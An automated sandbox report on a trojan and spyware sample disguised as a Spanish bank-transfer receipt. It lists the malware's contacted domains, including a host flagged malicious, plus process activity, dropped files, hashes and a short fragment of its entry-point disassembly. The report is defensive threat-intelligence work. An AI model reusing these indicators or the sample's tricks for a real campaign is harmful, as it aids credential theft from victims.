http://cps.letsencrypt.org0	0%	Avira URL Cloud	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	0%	Avira URL Cloud	safe
http://YacheoH9CTlBmpI1K.comt	0%	Avira URL Cloud	safe
http://x1.i.lencr.org:80/	0%	Avira URL Cloud	safe
http://pYhQFb.com	0%	Avira URL Cloud	safe
http://mail.neopyme.com	0%	Avira URL Cloud	safe
http://YacheoH9CTlBmpI1K.com	0%	Avira URL Cloud	safe
http://YacheoH9CTlBmpI1K.comt-	0%	Avira URL Cloud	safe
http://neopyme.com	0%	Avira URL Cloud	safe
http://r3.i.lencr.org/09	0%	Avira URL Cloud	safe
http://x1.c.lencr.org/0	0%	Avira URL Cloud	safe
http://x1.i.lencr.org/0	0%	Avira URL Cloud	safe
http://r3.o.lencr.org0	0%	Avira URL Cloud	safe
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.185.110	true	false		high
neopyme.com	54.36.109.179	true	true	0%, Virustotal, Browse	unknown
googlehosted.l.googleusercontent.com	142.250.185.225	true	false		high
x1.i.lencr.org	unknown	unknown	false	1%, Virustotal, Browse	unknown
mail.neopyme.com	unknown	unknown	true		unknown
doc-0s-b8-docs.googleusercontent.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://doc-0s-b8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrinn52haphefl414ecufsqsvklm/1637586450000/17803878832083720643/*/1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT?e=download	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://x1.i.lencr.org/U	CasPol.exe, 0000000B.00000002.5710155753.000000002102A000.00000004.00000010.sdmp	false	Avira URL Cloud: safe	unknown
http://127.0.0.1:HTTP/1.1	CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://x1.i.lencr.org/	CasPol.exe, 0000000B.00000002.5676049058.0000000000F27000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.5710155753.000000002102A000.00000004.00000010.sdmp, 2D85F72862B55C4EADD9E66E06947F3D0.11.dr	false	Avira URL Cloud: safe	unknown
http://DynDns.comDynDNS	CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://cps.letsencrypt.org0	CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0s-b8-docs.googleusercontent.com/-	CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp	false		high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha	CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://YacheoH9CTlBmpI1K.comt	CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org:80/	CasPol.exe, 0000000B.00000003.1879317771.000000001FEBA000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://support.google.com/chrome/?p=plugin_flash	CasPol.exe, 0000000B.00000002.5700265223.000000001DD36000.00000004.00000001.sdmp	false		high
http://pYhQFb.com	CasPol.exe, 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0s-b8-docs.googleusercontent.com/&/	CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp	false		high
https://doc-0s-b8-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/cbqvfrin	CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp	false		high
http://mail.neopyme.com	CasPol.exe, 0000000B.00000002.5701328362.000000001DDA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://YacheoH9CTlBmpI1K.com	CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://YacheoH9CTlBmpI1K.comt-	CasPol.exe, 0000000B.00000002.5699329145.000000001DCD2000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://neopyme.com	CasPol.exe, 0000000B.00000002.5701328362.000000001DDA3000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp	false		high
http://r3.i.lencr.org/09	CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.i.lencr.org/0	CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://drive.google.com/T	CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp	false		high
http://r3.o.lencr.org0	CasPol.exe, 0000000B.00000002.5677098382.0000000000F47000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
https://csp.withgoogle.com/csp/report-to/gse_l9ocaq	CasPol.exe, 0000000B.00000003.904616144.0000000000F6A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://doc-0s-b8-docs.googleusercontent.com/	CasPol.exe, 0000000B.00000003.910118192.0000000000F6A000.00000004.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
54.36.109.179	neopyme.com	France	16276	OVHFR	true
142.250.185.110	drive.google.com	United States	15169	GOOGLEUS	false
142.250.185.225	googlehosted.l.googleusercontent.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.11.1

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	526293
Start date:	22.11.2021
Start time:	14:03:45
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 14m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	justificante de la transfer.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, IE 11, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/6@4/4
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 96% Number of executed functions: 130 Number of non-executed functions: 16
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MusNotification.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, MoUsoCoreWorker.exe, MusNotificationUx.exe, IntelPTTEKRecertification.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 20.82.207.122, 51.105.236.244, 209.197.3.8, 104.89.32.83 Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, wu-shim.trafficmanager.net, wd-prod-cp-eu-north-2-fe.northeurope.cloudapp.azure.com, settings-win.data.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wdcp.microsoft.com, arc.msn.com, wd-prod-cp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, ris.api.iris.microsoft.com, wdcpalt.microsoft.com, login.live.com, evoke-windowsservices-tas.msedge.net, wd-prod-cp-eu-west-1-fe.westeurope.cloudapp.azure.com, continuum.dds.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, nexusrules.officeapps.live.com, manage.devcenter.microsoft.com, crl.root-x1.letsencrypt.org.edgekey.net Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
14:07:29	Task Scheduler	Run new task: Intel PTT EK Recertification path: "C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe"
14:08:09	API Interceptor	2768x Sleep call for process: CasPol.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
54.36.109.179	Ticari Hesap #U00d6zetiniz.exe	Get hash	malicious	Browse
	DdLvU2Gt7P.exe	Get hash	malicious	Browse
	justificante de la transfer.exe	Get hash	malicious	Browse
	factura n#U00ba0248325.exe	Get hash	malicious	Browse
	justificante de la transfer.exe	Get hash	malicious	Browse
	ejecutable.exe	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
OVHFR	1711.doc	Get hash	malicious	Browse	51.210.242.234
	#001245DOC.exe	Get hash	malicious	Browse	51.83.52.225
	50% TT advance copy.doc	Get hash	malicious	Browse	213.251.158.218
	j1KoQBOY48	Get hash	malicious	Browse	137.74.69.192
	cLFto0fGsb	Get hash	malicious	Browse	51.255.137.219
	sVO9t8HDBT.exe	Get hash	malicious	Browse	51.222.241.167
	arm7-20211121-1750	Get hash	malicious	Browse	193.70.126.139
	1516i9qcBS	Get hash	malicious	Browse	164.132.183.226
	kQONXU7aie	Get hash	malicious	Browse	37.59.162.148
	sora.arm7	Get hash	malicious	Browse	149.60.183.109
	3CZk5xMzFd	Get hash	malicious	Browse	178.32.95.243
	mfFr814Hup	Get hash	malicious	Browse	178.32.95.234
	OJB73xstFm	Get hash	malicious	Browse	217.182.97.113
	http___103.170.255.140_pdfword_invc_000930003999000.wbk	Get hash	malicious	Browse	164.132.152.67
	PjvBTyWpg6.exe	Get hash	malicious	Browse	91.121.181.6
	68886.xlsx	Get hash	malicious	Browse	51.81.73.1
	GQwxmGZFvtg.dll	Get hash	malicious	Browse	51.210.242.234
	7KLSwxaLAd.exe	Get hash	malicious	Browse	51.68.142.233
	3eMNB.exe	Get hash	malicious	Browse	51.83.52.225
	zp0sV06VUd.dll	Get hash	malicious	Browse	54.37.70.105

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	justificante de la transfer.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	7A0h5A8BmF.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	AP_Remittance_SWT130003815_0.html	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	TEVRKPBK.EXE	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	ATTACHMENT 6637268#Hydro tech BG_pdf.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	202111161629639000582.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	6wV8uoO6lW.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	L9s7zh4pKD.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	qGwn1hxOmZ.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	gIT7daOBPt.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	f4gxrcTDkV.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	SOO6hKZ7M0.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	SOO6hKZ7M0.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	f4gxrcTDkV.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	BW5D0n506F.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	cs.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	0MGLPJiSa5.dll	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	Quote estimate.html	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	I6erIt5Uil.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225
	I6erIt5Uil.exe	Get hash	malicious	Browse	142.250.185.110 142.250.185.225

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	Microsoft Cabinet archive data, 61414 bytes, 1 file
Category:	dropped
Size (bytes):	61414
Entropy (8bit):	7.995245868798237
Encrypted:	true
SSDEEP:	1536:EysgU6qmzixT64jYMZ8HbVPGfVDwm/xLZ9rP:wF6qmeo4eH1m9wmLvrP
MD5:	ACAEDA60C79C6BCAC925EEB3653F45E0
SHA1:	2AAAE490BCDACCC6172240FF1697753B37AC5578
SHA-256:	6B0CECCF0103AFD89844761417C1D23ACC41F8AEBF3B7230765209B61EEE5658
SHA-512:	FEAA6E7ED7DDA1583739B3E531AB5C562A222EE6ECD042690AE7DCFF966717C6E968469A7797265A11F6E899479AE0F3031E8CF5BEBE1492D5205E9C59690900
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	MSCF............,...................I.......;w........RSNj .authroot.stl..>.(.5..CK..8T....c_.d...A.K...+.d.H..i.RJJ.IQIR..$t)Kd.-[..T\{..ne......<.w......A..B........c...wi......D....c.0D,L........fy....Rg...=........i,3.3..Z....~^ve<...TF....f.zy.,...m.@.0.0...m.3..I(..+..v#...(.2....e...L..y..V.......~U...."<ke.....l.X:Dt..R<7.5\A7L0=..T.V...IDr..8<....r&...I-.^..b.b.".Af....E.._..r.>.`;,.Hob..S.....7'..\.R$.".g..+..64..@nP.....k3...B.`.G..@D.....L.....`^...#OpW.....!....`.....rf:.}.R.@....gR.#7....l..H.#...d.Qh..3..fCX....==#..M.l..~&....[.J9.\..Ww.....Tx.%....]..a4E...q.+...#.a..x..O..V.t..Y1!.T..`U...-...< _@...\|(.....0..3.`.LU...E0.Gu.4KN....5...?.....I.p..'..........N<.d.O..dH@c1t...[w/...T....cYK.X>.0..Z.....O>..9.3.#9X.%.b...5.YK.E.V.....`./.3.._..nN]..=..M.o.F.._..z....._...gY..!Z..?l....vp.l.:.d.Z..W.....~...N.._.k...&.....$......i.F.d.....D!e.....Y..,.E..m.;.1... $.F..O.F.o_}.uG....,.%.>,.Zx.......o....c../.;....g&.....

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	dropped
Size (bytes):	192
Entropy (8bit):	2.7842198674325394
Encrypted:	false
SSDEEP:	3:kkFklG2vy/tfllXlE/zMciHlhlXNNX8RolJuRdyo1dlUKlGXJlDdt:kKf2K/q1iT7NMa8Rdy+UKcXP
MD5:	5A34F69593AD4BF9930367C40142AF4A
SHA1:	900F463920FEA660202D8F392C9C26977175B0D0
SHA-256:	E6633957620790F362C78A037BEFFEF5AC032702D80EF8B1855616CD33CD2D97
SHA-512:	F21370E17C1744ACC158F2C22CE46663D39E25A5A93968725B54EB329C0F51E0E19DC743BE2E07AF0E60DF2926B5D2A4ABBFB48CA24336D8B00B4321CE2049D8
Malicious:	false
Reputation:	low
Preview:	p...... ........u......(....................................................... ..........~...................o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".5.a.6.2.8.1.5.c.-.5.6.f."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	data
Category:	modified
Size (bytes):	328
Entropy (8bit):	3.112261679299932
Encrypted:	false
SSDEEP:	6:kKp3/zk8SN+SkQlPlEGYRMY9z+4KlDA3RUeYlUmlUR/t:R/z9kPlE99SNxAhUeYlUSA/t
MD5:	EF4AB2F7F596354F3968C6D32A52DEAF
SHA1:	C968C7A3647AA50043B46AC2D525DB3F1728CDE3
SHA-256:	F4BF57BEA0B756E9F89504A4D2E3CB18D58FEA9D1946D302809092FF066CB4FA
SHA-512:	2A773FF640FEF0A9C98D13A7083129339372B0369C42137579446AFBFA296155679BEF5F9D8A4311F8079AC20FA862380C2F6AEA890E20587C7DC782B64EF8F7
Malicious:	false
Reputation:	low
Preview:	p...... .........f......(....................................................... ........q.\].......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.7.1.e.1.5.c.5.d.c.4.d.7.1.:.0."...

C:\Users\user\AppData\Local\Temp\~DFC7BBBE7FAB9778BB.TMP Download File
Process:	C:\Users\user\Desktop\justificante de la transfer.exe
File Type:	Composite Document File V2 Document, Cannot read section info
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	1.351590352286438
Encrypted:	false
SSDEEP:	48:rSTIhbzrJeuFpbB5KivFyAEcSRRfPD9PPba:7bzrJFFVB5KityAEcSLL9La
MD5:	D3984E0D0AAA56BBDF17314D4CFF0945
SHA1:	C0C7838BB49133CAD3B9DD5DE562DDE05463D379
SHA-256:	2EE69010A71F26BFCFB8DDA0379733605F5A7EE0C91ABB012F766E32C3D94D24
SHA-512:	C81FA9FCCAB4DD2984E1BD27C76D253EB667115A65475FAD5A7D2EBB726376BB048E4795EB2F79FEF386B06547EF976D762899CA1EAB0026656254E3A5062944
Malicious:	false
Preview:	......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	30
Entropy (8bit):	3.964735178725505
Encrypted:	false
SSDEEP:	3:IBVFBWAGRHneyy:ITqAGRHner
MD5:	9F754B47B351EF0FC32527B541420595
SHA1:	006C66220B33E98C725B73495FE97B3291CE14D9
SHA-256:	0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
SHA-512:	C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
Malicious:	false
Preview:	NordVPN directory not found!..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.187050367832804
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	justificante de la transfer.exe
File size:	286720
MD5:	e565201ac69a8a2fa7ee22e0809f7b3c
SHA1:	fed196aeff9aca57c198b0b99a9c9bc6e01d31b9
SHA256:	b6fad861abae70b69d7f0ef4e51756b181149e165ada09aee47e3d2bd5f9a0c6
SHA512:	b40afaa6d2f831ef3ec0f8170cc0fa2d8cb8be978861613f0f1149451ad06c4e75e6cb9341ce7ee2173f0bff87c92d1eab6cc0b0584c03174860cc47825d6e24
SSDEEP:	3072:KUDFBR3qusY6Ric7RnqRNiY61rsS1IHK2looQkoW2nLEHHDSG:H5B1R6Riyci4GUFf2noH
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W...K...W...u...W...q...W..Rich.W..........................PE..L.....OS.................0... ...............@....@

File Icon


Icon Hash:	f89ea9acb4b0b092

Static PE Info

General
Entrypoint:	0x4013fc
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x534FFE1F [Thu Apr 17 16:15:27 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	d7d4adb5e5d083da305ede89b87ddf22

Entrypoint Preview

Instruction
push 004152B8h
call 00007F1BB45FFFE5h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
mov edi, 242E4449h
pop ss
cmp al, 46h
xchg eax, ebx
rol ch, cl
movsb
mov eax, dword ptr [00402E03h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add dl, al
or dword ptr [edi+00h], ecx
add byte ptr [eax+72617073h], al
add byte ptr [ebp+64h], ah
imul eax, dword ptr [eax], FF000000h
int3
xor dword ptr [eax], eax
cmp byte ptr [edi+6C4C0488h], ah
and ah, byte ptr [ebx]
inc esp
mov edx, 7AA65DE5h
jnle 00007F1BB45FFF95h
mov esi, dword ptr [edi]
cmp dh, byte ptr [ebp+395CD42Bh]
dec ebp
sbb dword ptr [ebx], 5Ch
push 00000049h
outsd
mov eax, AD4F3A62h
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
sar byte ptr [ebx], cl
add dword ptr [eax], eax
inc ebx
or al, byte ptr [eax]
add byte ptr [eax], al
or byte ptr [eax], al
inc edi
dec edi
dec esi
dec edi
inc ebx
pop ecx
push esp
inc ebp
add byte ptr [48000501h], cl
dec ecx
push edx
inc ebp
dec esi
add byte ptr [ecx], bl
add dword ptr [eax], eax
inc edx
add byte ptr [edx], ah
add esp, dword ptr [ebx]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x42ca4	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x45000	0xdbe	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x238	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x14c	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x42204	0x43000	False	0.333820399953	data	6.29830429337	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x44000	0xd78	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x45000	0xdbe	0x1000	False	0.4873046875	data	4.27786524894	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
CUSTOM	0x45d92	0x2c	ASCII text, with CRLF line terminators	English	United States
RT_ICON	0x4582a	0x568	GLS_BINARY_LSB_FIRST
RT_ICON	0x453c2	0x468	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x453a0	0x22	data
RT_VERSION	0x45170	0x230	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaAryConstruct2, __vbaI2I4, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, __vbaRedim, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaInStrVar, _CIlog, __vbaErrorOverflow, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Cappuccino
FileVersion	4.00
CompanyName	Fastly
ProductName	medicinalfirmaerne
ProductVersion	4.00
OriginalFilename	Cappuccino.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 22, 2021 14:07:57.422377110 CET	49755	443	192.168.11.20	142.250.185.110
Nov 22, 2021 14:07:57.422399044 CET	443	49755	142.250.185.110	192.168.11.20
Nov 22, 2021 14:07:57.422547102 CET	49755	443	192.168.11.20	142.250.185.110
Nov 22, 2021 14:07:57.439280987 CET	49755	443	192.168.11.20	142.250.185.110
Nov 22, 2021 14:07:57.439294100 CET	443	49755	142.250.185.110	192.168.11.20
